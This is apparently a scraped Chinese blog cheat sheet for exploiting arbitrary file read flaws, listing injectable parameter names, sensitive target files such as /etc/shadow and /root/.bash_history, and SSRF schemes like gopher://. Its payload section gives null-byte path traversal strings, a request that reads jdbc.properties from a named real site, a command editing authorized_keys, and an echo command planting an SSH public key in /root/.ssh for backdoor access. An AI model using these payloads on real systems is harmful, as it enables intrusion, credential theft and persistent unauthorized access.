2. 程式人生 > >任意檔案讀取路徑、欄位和payload

任意檔案讀取路徑、欄位和payload

阿新 發佈:2018-12-23

敏感欄位

&RealPath=
&FilePath=
&filepath=
&Path=
&path=
&inputFile=
&url=
&urls=
&Lang=
&dis=
&data=
&readfile=
&filep=
&src=
&menu=
META-INF
WEB-INF
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17

可利用路徑

/etc/shadow 
/etc/passwd 
/etc/hosts

 
/root/.bash_history 找user add,cd,mysql,ssh,nohop看敏感目錄和檔案等 
/etc/syscomfig/network-scripts/ifcfg-eth1 
sed -i ‘/95_251/d’ /root/.ssh/authorized_keys 
url=file:///etc/passwd 
(ssrf內網探測) 
/opt/nginx/conf/nginx.conf 
file:///,gopher://,ftp:// 
/configs/database.php

Payload

  1. http://...:8080/%c0%ae/WEB-INF/classes/com/huilan/application/action/PeopleBankAction.class

  2. 配合截斷規則:/etc/passwd%00.jpg

  3. ../../../../../../../../../../etc/passwd%00.jpg

  4. http://www.zzvcom.com/cms/interface.jsp?time=41&data={readfile:%27/WEB-INF/classes/jdbc.properties%27}&jsoncallback=jsonp1442909681355

  5. echo ssh-rsa 
    AAAAB3NzaC1yc2EAAAABIwAAAQEA0jrJeJfEURdpG/jddXzk3zZYxQfdHbgPC4QYh5qx0F2SS1Q+uCW6j2cM/SxqhocfgDYw1CTikNTlJ43tzv1ozpSRjmLH26aTxGDUnXsvyVLeWdrjPni1FoVffW+LM0rZVh7A74Vi1bDr7IP7XjSMQU157rye7++G+eWA1NhscIiiJ/pwUKAjPSiEx+8DXN8ccTDyWrSnD+NfUQXPO4dVFu2MR5/VjLO2yWsVMwenCPwItf5xEwGqU5KbzxeTOyDnYYLk7UF6lBYpSDZC9U3mNL1alYgNnIbmZGYg921KFh28BRptDewh5MRDKmfMUSqeZpIZ95Pq8lG1sObcjNzDew==

    [email protected]_251.easou.com >> /root/.ssh/authorized_key

相關推薦

任意檔案讀取路徑payload

敏感欄位 &RealPath= &FilePath= &filepath= &Path= &path= &inputFile= &url= &urls= &Lang= &dis= &da

0服務啟動前之日誌格式

1、日誌聚合體的欄位和格式,日誌上報策略 公有欄位 createAtMs:日誌建立時間 appId :應用唯一標識,如微信、qq、微博 tenantId :租戶唯一標識,企業使用者 deviceid :收集裝置唯一標識 appVersion:應用版本 aPPChannel:應

ORACLE——在所有表中查詢某個字串並輸出表名

什麼都不想說,直接上乾貨 declare v_Sql varchar2(2000); v_count number; begin for xx in (select t.OWNER, t.TABLE_NAME, t.COLUMN_NAME from

Weblogic漏洞之弱口令任意檔案讀取上傳shell

弱口令 環境啟動後,訪問http://192.168.1.15:7001/console/login/LoginForm.jsp,即為weblogic後臺。 本環境存在弱口令可以直接登入: weblogic [email protected]

檢視修改 mysql庫編碼

檢視編碼 檢視資料庫編碼。 show variables like '%char%'; 查看錶編碼 show create table <表名>; 例:show create table user; 檢視欄

Java物件例項的關係Java資料封裝Java繼承多型Java抽象類介面Java靜態方法Java包作用域Java的classpathjarJava核心類

Java物件和例項的關係: 面向物件程式設計(Object-Oriented Programming),是對現實世界建立計算機模型的一種方法。 class是物件的模板,它定義瞭如何建立例項,class的名字就是資料型別。一個class裡可以有多個欄位(field),欄位用

postgresql獲取表結構,表名表註釋型別及長度註釋(轉載)

轉載地址:https://blog.csdn.net/weixin_38924323/article/details/80982760 場景描述:navicate 將postgresql表結構匯出到Excel。 1、查詢表名和表註釋 select relna

springboot專案練習三 配置solr配置檔案

編寫solr的配置類完成solrClient的注入 編寫操作solr的常用操作封裝CRUD操作 編寫controller類完成匯入資料的程式入口 1  新建solrContext.java檔案 package com.gc.config; import

16.Struts2_OGNL讀取Map棧(Context Map)裡物件的屬性及其他方法

一.讀取Context Map裡的物件的屬性 1.若想訪問ContextMap裡的某個物件的屬性,可以使用以下幾種方式形式之一: #object.propertyName#object.['propertyName']#object.["propertyName"] 示例:

List實體集合更改任意Model中某一個的值,其他Model值也一起變了,引用型別值型別的問題

工作中遇到這麼一個問題,現在有一個Model,我需要將該Model變為兩個Model並且放入List集合當中去,這兩個Model完全一樣,但是其中某個欄位的值不一樣,經過直接賦值我們發現整個List中所有Model的那個欄位值都變成一樣的了,並沒有修改成功,因此設計到了引用

【演算法設計與分析】6最大

/** * 書本:《演算法分析與設計》 * 功能:若給定n個整陣列成的序列a1, a2, a3, ......an, 求該序列形如ai+a(i+1)+......+an的最大值 * 檔案:MaxSum.cpp * 時間:2014年11月30日17:37:26 * 作者:cu

[]Oracle]查詢表中每隔是否主鍵,查詢表名主鍵資料型別是否為空註釋

select    utc.column_name as 欄位名,utc.data_type 資料型別,utc.data_length 最大長度,CASE utc.nullable WHEN 'N' THEN '否' ELSE '是' END 可空,utc.data_defa

spring xml讀取Properties檔案中的加密

spring的xml配置檔案,能夠方便地讀取properties檔案中的值。 讀取單個屬性檔案: <bean class="org.springframework.beans.factory.c

常量方法屬性索引器(C#)

常量(Constants) 常量是在編譯時已知並在程式的生存期內不發生更改的不可變值。 常量使用 const 修飾符進行宣告。 只有 C# 內建型別(System.Object 除外)可以宣告為 const。使用者定義的型別(包括類、結構和陣列)不能為 con

蠻力分治動態規劃求解最大問題(aardio)

最近的演算法課上要求做的一個實驗是分別用蠻力、分治、動態規劃求解最大欄位和問題。 以下是相關程式碼: 陣列求和程式段: var getsum = function(tab,frist,l

第六課 相對絕對路徑創建刪除目錄及cdrm命令的使用

20180326一、相對路徑和絕對路徑 pwd命令: 打印查看當前路徑 絕對目錄就是以/(根)開頭的,相對路徑就是相對當前目錄,不是以/(根)開頭的。 二、cd命令cd 進入到一個目錄cd - 進入上次的目錄(相當於遙控器上的相互交替的按鍵)cd ~ 回到用戶家目錄cd .. 進入到上一級目錄 三、創

使用類的靜態建構函式,可以跟蹤某個類所建立物件的個數

  package TongJi; public class Duixiang { private static int n; public Duixiang() { n++; } public static int g

使用類的靜態建構函式,可以跟蹤某個類所建立物件的個數。請寫一個類,在任何時候都可以向它查詢“你已經建立了多少個物件?”

public class Genzong { private static int n = 0; public Genzong() { n++; } public static int GetNum() { return n; }

分治法 解決最大問題

分治法求解最大欄位和問題 1 問題描述   給定由n個整數(可能由負數)組成的序列(a1, a2,...,an),最大欄位和問題求 該序列中連續子段和的最大值,並找出這個連續子段。 2 使用python程式設計解決,具體程式碼如下   # 求出最大子段和, 以及最大子段和 對應的位置

最大 動態規劃

最大子段和 給定由n個整數(可能有負整數)組成的序列(a1,a2,…,an),最大子段和問題要求該序列形如 的最大值(1<=i<=j<=n),當序列中所有整數均為負整數時,其最大子段和為0。 #include<stdio.h> #include<